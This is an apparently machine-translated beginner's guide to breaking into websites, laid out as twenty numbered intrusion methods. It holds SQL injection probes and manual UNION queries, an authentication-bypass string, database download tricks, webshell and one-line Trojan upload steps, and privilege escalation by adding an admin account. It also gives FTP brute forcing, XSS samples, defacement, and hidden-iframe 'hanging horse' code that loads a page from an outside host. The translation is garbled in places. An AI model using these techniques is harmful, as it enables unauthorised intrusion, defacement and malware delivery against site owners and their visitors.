Website intrusion Ideas (primary hacker penetration) Author: 80
1,〓 Classic Injection
Usually, to determine whether a site has an injection point, you can use ', and 1=1, and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2, to determine if and 1=1 normal return page, 1=2 error, or could not find , then there is an injection point
2,〓 Universal Password or vulnerability
Universal password ' or ' = ' or ', can be used in the background management input, some sites because there is no filter or vulnerability, input or directly can break through, the general vulnerability exists in the ASP type of Web site
3,〓 in the Vault
Explosion library, can be understood as the burst database download, with the explosion of the library and other tools can directly get the administrator user and password,%5c 16 binary \ Symbol, And the database is larger than 5.0 can be a bomb, such as in PHP manual advanced Injection, with version () This variable guess the site database version, if a site database is greater than 5.0, and is the acess database, then the submission address is: HTTP://WWW.XXX.COM/RPC /show24.asp?id=127, we add the%5c directly behind the RPC, because%5C is a two-level directory, so it should be so, http://www.xxx.com/rpc%5c/show24.asp?id=127, and%23 is the representative #, If the administrator has changed the database to #database.mdb in order to prevent others from illegally downloading the database, this prevents if the page address is http://www.xx.com/rpd/#database. mdb, so we add%23 to replace #, Http://www.xx.com/rpd/%23database.mdb
4,〓cookie relay, SQL anti-injection program to remind you that IP has been recorded
Cookie relay, SQL anti-injection, if the detection of a Web site, pop up such a dialog box, above the SQL anti-injection program to remind the word, then we can use the cookie relay, inject transit to break through, the method is to build an ASP environment (and the site is an ASP site), Then open the Relay tool, remember the page address of a website paste into the tool, the value is how much write how much, generate, put the generated file into the directory, next, open the Web page, enter http://127.0.0.1: (port)/directory files, if normal, then input/HTTP/ 127.0.0.1: Port/value (directory file)? Submit the value, then get the tool to guess the name of the table, column name
5,〓 Handmade
ASP manual statement table name and exists (SELECT * from table name)
Column name and (select COUNT (column name) from table name) >0
Length and (select top 1 len (username) from admin) >0
Content and (select top 1 ASC (Mid (username,1,1)) from admin) >100
PHP Manual statement: ORDER by (guess field), and 1=2 Union Select (Number of fields) and 1=2 union Selsect from (position)
If there are 30 fields, then the http://www.xxx.com/showfo.jsp?id=130 and 1=2 Union Select should be entered after the address is injected 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28.29,30
Several common variables, USER (), version () < database versions), database () < DB name >
6,〓 grab bag and grab Webshell〓
If you go to the background to find, point database backup when found, you can grab the package to get uploads, get Webshell, tools wosck grab bag, a picture, an ASP horse, self-build an upload address, upload loading, upfile upload, cookis= ()
7,〓 database backup take Webshell and a word Trojan invasion
Usually into the background, found a database backup, take Webshell bar, find a place to add products, pass a big horse, format jpg picture, and then paste the image address to the database backup there, give a name, such as Shell.asp, Then address access to enter the Webshell, a word Trojan invasion, first edit Notepad, add a sentence, change to 2.jpg, and then backup, access, found 500 internal server error, prove a word success, next with a word Trojan Client connection, get the path page, and then change the name of the horse, Enter da Ma content, submit, get Webshell
8,〓DB Permissions differential backup take Webshell〓
If a site injection point is a MySQL database, and is DB permissions, or SA permissions, can be listed, then it is good to do, find the directory of the site, the directory is usually in D and e disk, backup a pony, and address access to see success No, direct backup big horse seemingly no, after success, then enter the big horse content, Get Webshell.
9,〓 looking backstage
Looking backstage, the general default is admin,admin/admin.asp,admin/login.asp,.admin_login.asp,manage/login.asp,login.asp,logon,user.asp, Admin/index.asp, of course, this is only the default, some large web site can not also use the admin as the backstage, some hidden very deep, may be simple with site: website inurl: Background to guess, or download the source HTML file analysis to find backstage, or with a variety of tools to scan, a lot of
10,〓 Script Hints
Some web site requirements into the background will appear a script hint, like VB programming in InputBox "", a Dialog input box, we enter administrator breakthrough, admin representative as administrator to enter
11,〓php Backdoor and Ewebeditor editor intrusion
PHP backdoor, such as the previous burst of Disz loophole, in a PHP site after adding c.php, if appear 1, then pass a php horse to get Webshell,ewebeditor editor intrusion, is a very fast way to set the upload file type, spread ASA, or other format, Then access to get Webshell, if not directly add the statement to get Webshell
12,〓 Upload Vulnerability
Some sites, although there is no injection point, but there is an upload vulnerability, then how we come to use, first, open the upload address to see if there is, if there is, think of an ASP big horse is not, then preach a word to see, first see can succeed, with the Ming boy to upload, dynamic network, power, dynamic, Joek 4 ways, Page address format to correspond, if a website address pop-up dialog box, display upload success, then prove can get Webshell, pass the horse, the other has no display, direct empty, then can build two uploads, the first picture of the JPG, the Second pass ASP Horse (Big horse), remember, Big horse behind to have a space to line, if a website address appears file type is incorrect, please re-upload, then prove%90 can get Webshell, just format not, not allow, change suffix, as long as the site does not filter the format, if a website address display please login and upload, Then prove not to get Cookis, the idea is to register a user on the site, get Cookis, and then upload the success
13,〓 simple right to take the server and serv right and pcanywhere three-party right
Simply take down the server, that is, the site IP host, first we need a webshell, and then look at the component information, see the path can be read can write no, if there is a can, then come to the cmd command, the first input writable file content, execute command plus an account and the highest administrative rights, Then enter the Netstat-an, get the host connection port, and then enter with 3389 connection, let it become a broiler (best), so more covert we operate
14,〓 anti-invasion and marginal note and social engineering
Anti-check IP intrusion, that is, intrusion 21, port, first we invade the site first ping WWW.XXX.COM, out IP, and then to the reverse IP site to check how many domain names, next, add [email protected] address, added dictionary, (inside more collect possible passwords, such as 123,321,456), and then use streamer detection password, login ftp://ip, enter the user and password, change information and so on, social engineering x-way, to get the FTP password, also need to collect, not every line, in short is their own experience
15,〓 Cross-site scripting attack
Cross-site (CSS), passive attack, now requires more thinking and experience
Three-segment classic cross-site code
<script>alert ("Cross-site start") </script>
<script>alert ("Document.cookie") </script>
<script>window.open (http://www.hackgirl.net) </script>
16〓 Special Space
Use tab to create a special space, and then enter a space when registering, add management name, casually on the site to find a bamboo, or manage the name, so to register, and sometimes their own registered this will become the administrator
17,〓 Change Home
Change homepage, get Webshell, first find home file, general for index.asp,index.php.index.jsp,index.html, then come to the site root directory, edit index.asp (home), empty, best backup, Enter your own home code (Black page), save it, and then visit it to become the result you want.
18,〓 Hanging Horse
First in the Webshell, create a text, change to 1.htm, next to the bottom of the page to hang
Two pieces of classic hanging horse code
<iframe src= "http://www.xxxx.com/2.htm" width= "0" height= "0" frameborder= "0" ></iframe>
<script language=javascript>
window.open ("http://www.xxx.com/2.htm", "", "Toolbar=no,location=no,directories=no,status=no,menubar=no, Scrollbars=no,width=1,height=1 ");
</script>
19〓google back statement (many)
Inurl:asp?id=, inurl:show.asp, inurl:went.asp, inurl:jsp?id=,inurl:php?id=
20,〓 self-seeking vulnerability
Based on their own technical experience and accumulation, to find the loopholes have not been found (thinking problem)
Website intrusion Ideas (primary hacker penetration) Author: 80
